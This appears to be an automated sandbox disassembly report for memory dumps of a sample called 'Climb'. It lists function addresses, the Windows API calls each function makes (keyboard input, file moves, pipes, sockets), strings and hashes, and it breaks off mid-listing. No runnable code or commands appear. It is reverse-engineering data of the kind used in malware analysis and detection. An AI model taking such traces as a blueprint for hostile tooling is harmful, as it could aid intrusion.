Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 50be03bacc5368a209c74c504c75047897c50a83486635bd0078ca4c390a1c50
Instruction ID: 659f9d5bfd45355ff9d1b10fb31dac98a85657e791785b925eb9f12886e072c6
Opcode Fuzzy Hash: 50be03bacc5368a209c74c504c75047897c50a83486635bd0078ca4c390a1c50
Instruction Fuzzy Hash: 8D51F3A09087D53EFB324634CC6EBB6BEA97B06305F08848AE9D5558D2C3D8ACCCD750

Function 0055B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0055B6E0
GetKeyboardState.USER32(?), ref: 0055B6F5
SetKeyboardState.USER32(?), ref: 0055B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0055B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0055B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0055B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0055B7FF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6d807a4df3fce815a26db2ec8f500bc73146459b3a4fdd4402569781f84bca0c
Instruction ID: bfb89f210bfd74dbadff3f635c2bdfb86243e558cec877f2fa8ae224c3d477ac
Opcode Fuzzy Hash: 6d807a4df3fce815a26db2ec8f500bc73146459b3a4fdd4402569781f84bca0c
Instruction Fuzzy Hash: F651F6A09147D53EFB3283348C79B76BEA8BB45305F0C848AE8D5568D2D395EC8CD751

Function 005257A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00525F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 005257E3
__fassign.LIBCMT ref: 0052585E
__fassign.LIBCMT ref: 00525879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0052589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00525F16,00000000,?,?,?,?,?,?,?,?,?,00525F16,?), ref: 005258BE
WriteFile.KERNEL32(?,?,00000001,00525F16,00000000,?,?,?,?,?,?,?,?,?,00525F16,?), ref: 005258F7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: adc4f732bddba57e1d491ecd92388bc30b8f5632f2540c0941d930bdc4ac21ac
Instruction ID: b04b5b41ed7b8d0a2b44eb5a6e04ea9a7c0fa27428304ad67994358c06d413dd
Opcode Fuzzy Hash: adc4f732bddba57e1d491ecd92388bc30b8f5632f2540c0941d930bdc4ac21ac
Instruction Fuzzy Hash: 5B51AF70A006599FCB11CFA8E885AEEBBF8FF1A310F14451AE951F7291E7309981CF60

Function 00513090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 005130BB
___except_validate_context_record.LIBVCRUNTIME ref: 005130C3
_ValidateLocalCookies.LIBCMT ref: 00513151
__IsNonwritableInCurrentImage.LIBCMT ref: 0051317C
_ValidateLocalCookies.LIBCMT ref: 005131D1

Strings

csm, xrefs: 00513166

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c81a499ae36034eac19a85e9de8dd82a7b86804971dad7e8061e36e68169786b
Instruction ID: 4bd97369d7d5128b16ec4c7ae5fadb702ec2dd2de6223e3794775517c4910a85
Opcode Fuzzy Hash: c81a499ae36034eac19a85e9de8dd82a7b86804971dad7e8061e36e68169786b
Instruction Fuzzy Hash: B941D334A0021AABDF10DF68C8A9ADEBFB5BF45324F148555E814AB392D731DF85CB90

Function 0055D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0055D7CD,?), ref: 0055E714

Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0055D7CD,?), ref: 0055E72D

lstrcmpiW.KERNEL32(?,?), ref: 0055D7F0
MoveFileW.KERNEL32(?,?), ref: 0055D82A
_wcslen.LIBCMT ref: 0055D8B0
_wcslen.LIBCMT ref: 0055D8C6
SHFileOperationW.SHELL32(?), ref: 0055D90C

Strings

\*.*, xrefs: 0055D89E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 6853b663e28371bbe9715b2d4d860d3184efbcf92d4c05da0fc2246e7d4208f2
Instruction ID: 36f6910db8444a9cd5f57c3e5bf3e719a3d56a0a9655058a5f54c3888d9feb13
Opcode Fuzzy Hash: 6853b663e28371bbe9715b2d4d860d3184efbcf92d4c05da0fc2246e7d4208f2
Instruction Fuzzy Hash: 8D4189728052199EDF12EFA4C996ADD7BB8BF48381F0004EBA905E7141EB34A78CCF50

Function 005642B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00564310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00564367
TranslateMessage.USER32(?), ref: 00564390
DispatchMessageW.USER32(?), ref: 0056439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005643AB

Strings

(\, xrefs: 0056437D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID: (\
API String ID: 2256411358-3685820393
Opcode ID: 9367f4426549cf0fece53992234bd02d5b81abcfd8f8cf22e8277c1005cf53fd
Instruction ID: 608b13137c67d936e597d437f92833dcd81e7aeb087e2d84c9d3f8b7391dc7c8
Opcode Fuzzy Hash: 9367f4426549cf0fece53992234bd02d5b81abcfd8f8cf22e8277c1005cf53fd
Instruction Fuzzy Hash: 4B319E70604646DEEB349B64D849FB63FA8BB21305F144D69E4A2832A0E7B498C9DF25

Function 00583899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 005838B8
GetWindowLongW.USER32(?,000000F0), ref: 005838EB
GetWindowLongW.USER32(?,000000F0), ref: 00583920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00583952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0058397C
GetWindowLongW.USER32(?,000000F0), ref: 0058398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 005839A7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 51f63bb0e700147efb2a8868d464eb06cb8f3400e17cb44ee0928b2ed0ea77b6
Instruction ID: b06cada52b2509999a4a5a1d9ddec3b7981d934f35ceea2925cd37309bb88f9a
Opcode Fuzzy Hash: 51f63bb0e700147efb2a8868d464eb06cb8f3400e17cb44ee0928b2ed0ea77b6
Instruction Fuzzy Hash: DE313730705255AFDB21EF49DC85F643BE5FB96B10F1411A4F910EB2B2CBB0A988EB11

Function 0055808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005580D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005580F6
SysAllocString.OLEAUT32(00000000), ref: 005580F9
SysAllocString.OLEAUT32(?), ref: 00558117
SysFreeString.OLEAUT32(?), ref: 00558120
StringFromGUID2.OLE32(?,?,00000028), ref: 00558145
SysAllocString.OLEAUT32(?), ref: 00558153

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c8cdccdba6900b87f5c9b4b3475db508c17d2f3b9873d574295010842fd89e8d
Instruction ID: ff126620af807dc465f387b7392d304618f976eaad7cfdaf66646478a0afa95d
Opcode Fuzzy Hash: c8cdccdba6900b87f5c9b4b3475db508c17d2f3b9873d574295010842fd89e8d
Instruction Fuzzy Hash: 1C218872600519AF9F10DFA8DC88CBA77ECFB093617048416FD05EB2A0DA70DC4ACB60

Function 00558164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005581A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005581CF
SysAllocString.OLEAUT32(00000000), ref: 005581D2
SysAllocString.OLEAUT32 ref: 005581F3
SysFreeString.OLEAUT32 ref: 005581FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00558216
SysAllocString.OLEAUT32(?), ref: 00558224

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 525fb05ab564b240f2f4d4e0e9f31d12709451357367cdfba7a03fbf22de45db
Instruction ID: 810e399088ed221972771044f9e75603b1075b09596497bdd6ce07d4b188dc61
Opcode Fuzzy Hash: 525fb05ab564b240f2f4d4e0e9f31d12709451357367cdfba7a03fbf22de45db
Instruction Fuzzy Hash: 71217475600504BF9F109BA8DC89DBA7BECFB09361B048126FD05EB2A0DA74EC45DB64

Function 00560E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00560E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00560ED5

Strings

nul, xrefs: 00560F0E

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: aa282a27fc6beabb81e7f8e4fd924a6ec382299d72d21fa56d082e995e7b3e80
Instruction ID: 30d997f495fa3e13a6daf92a15bb91fc84bcb4dffef8b4187a20f644be4013c3
Opcode Fuzzy Hash: aa282a27fc6beabb81e7f8e4fd924a6ec382299d72d21fa56d082e995e7b3e80
Instruction Fuzzy Hash: AA216B7450030AABDB308F28DC04A9BBBF8BF54720F205A59FCA5E72D0D771A844DB60

Function 00560F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00560F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00560FA8

Strings

nul, xrefs: 00560FE0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 857ac1f96189ac8e5829414e4bb1a68fc83106d7b9580cf4c9880ea9908c0820
Instruction ID: 504746a62c405caae6ef1e2eb954c58e117566c0616d62dcc83187994a513f3f
Opcode Fuzzy Hash: 857ac1f96189ac8e5829414e4bb1a68fc83106d7b9580cf4c9880ea9908c0820
Instruction Fuzzy Hash: 612181755007469BDF309F689C09AAABBF8BF55730F240A19FCA1E32D0D7719884DB64

Function 00584B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004F78B1
Part of subcall function 004F7873: GetStockObject.GDI32(00000011), ref: 004F78C5
Part of subcall function 004F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004F78CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00584BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00584BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00584BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00584BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00584BE3

Strings

Msctls_Progress32, xrefs: 00584B81

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: e72a0aacee38319086bf79ae963fbbebf8941e368c1cc2f91eec78bdc69756df
Instruction ID: 48d26d147e56708597e1aebe8b8b70c43b83cdd17232f8b0cd01657b81e0cb50
Opcode Fuzzy Hash: e72a0aacee38319086bf79ae963fbbebf8941e368c1cc2f91eec78bdc69756df
Instruction Fuzzy Hash: D11163B155021EBEEF119F65CC85EEB7FADFF08798F014111BA18A6090CA75DC21DBA4

Function 0052DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0052DB23: _free.LIBCMT ref: 0052DB4C

_free.LIBCMT ref: 0052DBAD

Part of subcall function 00522D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4), ref: 00522D4E
Part of subcall function 00522D38: GetLastError.KERNEL32(005C1DC4,?,0052DB51,005C1DC4,00000000,005C1DC4,00000000,?,0052DB78,005C1DC4,00000007,005C1DC4,?,0052DF75,005C1DC4,005C1DC4), ref: 00522D60

_free.LIBCMT ref: 0052DBB8
_free.LIBCMT ref: 0052DBC3
_free.LIBCMT ref: 0052DC17
_free.LIBCMT ref: 0052DC22
_free.LIBCMT ref: 0052DC2D
_free.LIBCMT ref: 0052DC38

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: 7c6deb1f453328efa851d3b7fa04fca2e746ee753fceaee36289fb8d52bf8778
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 81112E72581725B6D520BB70EC0EFCB7FACBF86700F410C19B2D9AA1D2D665A5054A60

Function 00556078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0055608D
_memcmp.LIBVCRUNTIME ref: 005560AB
_memcmp.LIBVCRUNTIME ref: 005560BE
_memcmp.LIBVCRUNTIME ref: 005560D6
_memcmp.LIBVCRUNTIME ref: 005560EE

Strings

j`U, xrefs: 0055609B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: _memcmp
String ID: j`U
API String ID: 2931989736-3304937784
Opcode ID: 7edaaaa4bb6486f090e9182ee58e7c2c56f4abe8ba740f4f0282a8537f520e11
Instruction ID: 0a80126a6e068f684cabce3d6c89eb16308a06af5e24ae214c512e6036e9e8a0
Opcode Fuzzy Hash: 7edaaaa4bb6486f090e9182ee58e7c2c56f4abe8ba740f4f0282a8537f520e11
Instruction Fuzzy Hash: 8401B5B16007467BAA1066205C66FAFBB5DFE51399B004822FE099B3C1E761ED58C2A5

Function 0055E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0055E328
LoadStringW.USER32(00000000), ref: 0055E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0055E345
LoadStringW.USER32(00000000), ref: 0055E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0055E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0055E36D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: fe7102b9f1c3211527b834831ee50fc5d40e3712f05d15241b77d44a2bb3e77f
Instruction ID: 9270808f1e55ffc811a2546e823d196d52ce51aaeffede442889fdf64f91172d
Opcode Fuzzy Hash: fe7102b9f1c3211527b834831ee50fc5d40e3712f05d15241b77d44a2bb3e77f
Instruction Fuzzy Hash: 5D0136F690020C7FE711ABA49D89EF77BBCEB08301F014592BB45F6091E6749E889B75

Function 00561312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00561322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00561334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00561342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00561350
CloseHandle.KERNEL32(00000000), ref: 0056135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 0056136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00561376

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: dc8c3c3a8d1e1674616615d7b5d06545772159c514f92f9d670af6d113e486ce
Instruction ID: 083deb53a717fa292539eaa5420ef226ef29485602b53647796e537d0168006f
Opcode Fuzzy Hash: dc8c3c3a8d1e1674616615d7b5d06545772159c514f92f9d670af6d113e486ce
Instruction Fuzzy Hash: EEF03C32142A02BBD3412F54EE4DBD6BB79FF14312F402421F502A28E0CB7594B8EFA4

Function 005726BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0057281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0057283E
WSAGetLastError.WSOCK32 ref: 0057284F
htons.WSOCK32(?,?,?,?,?), ref: 00572938
inet_ntoa.WSOCK32(?), ref: 005728E9

Part of subcall function 0055433E: _strlen.LIBCMT ref: 00554348

